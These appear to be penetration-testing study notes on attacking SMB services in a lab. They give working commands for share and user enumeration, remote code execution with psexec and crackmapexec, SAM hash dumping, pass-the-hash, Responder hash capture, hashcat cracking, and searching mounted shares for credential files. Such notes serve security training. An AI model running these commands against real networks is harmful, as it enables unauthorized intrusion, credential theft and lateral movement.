SMB
Encountering SMB
1. list all SMB shares using smbmap
2. use rpcclient to enumerate users
3. brute force SMB or check for anonymous access (dont specify username, hit enter for password)
4. after getting a foothold:
5. look for clear text credentials
6. Attempt RCE
7. Attempt Lateral Movement by PtH and enumerating logged on users
Table of Contents
- SMB
- Attacking SMB (Commands)
- List all SMB Shares
- Connecting to SMB
- rpcclient
- Brute-forcing SMB
- WIndows-specific Attacks
- Mounting SMB
SMB
port 137/138/139/445
Server Message Block is used for file sharing. Very common in Windows network.
see brute force SMB in Cracking Network Services
Attacking SMB
List all SMB Shares
smbclient
smbclient -N -L IP
smbmap (it also lists permissions along w/ shares; convenient)
smbmap -H IP
[+] IP: 10.129.14.128:445 Name: 10.129.14.128
Disk Permissions Comment
-- --------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY IPC Service (DEVSM)
notes READ, WRITE CheckIT
list all SMB shares of a user
smbclient -L -U username \\\\IP
Connecting to SMB
smbclient
smbclient //server-ip-or-name/share_name -U username
rpcclient
rpcclient -U "" 10.129.14.128
smbmap (using -r to recursively view all directories)
smbmap -H 10.129.14.128 -r notes
[+] Guest session IP: 10.129.14.128:445 Name: 10.129.14.128
Disk Permissions Comment
-- --------- -------
notes READ, WRITE
.\notes\*
dr--r--r 0 Mon Nov 2 00:57:44 2020 .
dr--r--r 0 Mon Nov 2 00:57:44 2020 ..
dr--r--r 0 Mon Nov 2 00:57:44 2020 LDOUJZWBSG
fw--w--w 116 Tue Apr 16 07:43:19 2019 note.txt
fr--r--r 0 Fri Feb 22 07:43:28 2019 SDT65CB.tmp
dr--r--r 0 Mon Nov 2 00:54:57 2020 TPLRNSMWHQ
dr--r--r 0 Mon Nov 2 00:56:51 2020 WDJEQFZPNO
dr--r--r 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup
smbmap download file
smbmap -H 10.129.14.128 --download "notes\note.txt"
smbmap upload file
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
rpcclient
| Query | Description |
|---|---|
srvinfo | Server information. |
enumdomains | Enumerate all domains that are deployed in the network. |
querydominfo | Provides domain, server, and user information of deployed domains. |
netshareenumall | Enumerates all available shares. |
netsharegetinfo <share> | Provides information about a specific share. |
enumdomusers | Enumerates all domain users. |
queryuser <RID> | Provides information about a specific user. |
view all users
rpcclient -U'%' 10.10.110.17
rpcclient $> enumdomusers
Brute-forcing SMB
SMB section in Cracking Network Services
Windows-specific Attacks
Linux SMB offers limited attack surface; Windows SMB has much more attack surface (if we have admin privileges, of course)
RCE on Windows SMB
with admin privileges, we can RCE the SMB using
impacket
impacket-psexec administrator:'Password123!'@10.10.110.17
crackmapexec
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
Enumerating Logged-on Users
enumerate all machines in the subnet if there are multiple machiens present and we want to know which users are logged on
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
PtH (Attacking SAM Databases)
dumb SAM Database hashes
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
more on this in Attacking SAM
after obtaining the hash, perform PtH attack or crack it
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
Forced Authentication Attacks via SMB
capture users' hashes by tricking systems into authenticating with a malicious server
Using Responder to carry out Forced Authentication Attack
responder -I <interface name>
example:
sudo responder -I ens33
hashes are saved in /usr/share/responder/logs/
If you notice multiples hashes for one account, hashes are salted
Cracking the intercepted NetNTLMv2 Hash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
if we can't crack the hash, perform PtH attack
Mounting SMB
Windows GUI
press [WINKEY] + [R] to open the Run dialog box; type the file share location, e.g.: \192.168.220.129\Finance
Windows CMD - dir
C:\htb> dir \\192.168.220.129\Finance\
Volume in drive \\192.168.220.129\Finance has no label.
Volume Serial Number is ABCD-EFAA
Directory of \\192.168.220.129\Finance
02/23/2022 11:35 AM <DIR> Contracts
0 File(s) 4,096 bytes
1 Dir(s) 15,207,469,056 bytes free
Windows CMD - Net Use
net use cam map a network share as a local drive
C:\htb> net use n: \\192.168.220.129\Finance
The command completed successfully.
authenticate w/ username and password:
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
The command completed successfully.
after mapping the Share to n: drive, we can execute commands as if it were a local drive
list how many files the share contains
C:\htb> dir n: /a-d /s /b | find /c ":\"
29302
Searching for specific files of interest
such as cred or secrets
C:\htb>dir n:\*cred* /s /b
n:\Contracts\private\credentials.txt
C:\htb>dir n:\*secret* /s /b
n:\Contracts\private\secret.txt
Use findstr to find credentials
c:\htb>findstr /s /i cred n:\*.*
n:\Contracts\private\secret.txt:file with all credentials
n:\Contracts\private\credentials.txt:admin:SecureCredentials!
Windows PowerShell
PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\
Directory: \\192.168.220.129\Finance
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2022 3:27 PM Contracts
Windows PowerShell - New-PSDrive instead of Net Use
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
N FileSystem \\192.168.220.129\Finance
authenticate w/ username and password
PS C:\htb> $username = 'plaintext'
PS C:\htb> $password = 'Password123'
PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
N FileSystem \\192.168.220.129\Finance
count how many files it contains
PS C:\htb> N:
PS N:\> (Get-ChildItem -File -Recurse | Measure-Object).Count
29302
Searching for secrets in PowerShell using -Include
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Directory: N:\Contracts\private
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/23/2022 4:36 PM 25 credentials.txt
Searching for secrets in PowerShell using Select-String
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
N:\Contracts\private\secret.txt:1:file with all credentials
N:\Contracts\private\credentials.txt:1:admin:SecureCredentials!
Linux
Linux - Mount
download cif-util
sudo apt install cifs-utils
sudo mkdir /mnt/Finance
sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
instead of password and username, we can use a credential.txt
credentialfile.txt
username=plaintext
password=Password123
domain=.
mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
Linux - Find & Grep
after mount, we can use find as if we're in the local directory
find /mnt/Finance/ -name *cred*
/mnt/Finance/Contracts/private/credentials.txt
we can use grep too
grep -rn /mnt/Finance/ -ie cred
/mnt/Finance/Contracts/private/credentials.txt:1:admin:SecureCredentials!
/mnt/Finance/Contracts/private/secret.txt:1:file with all credentials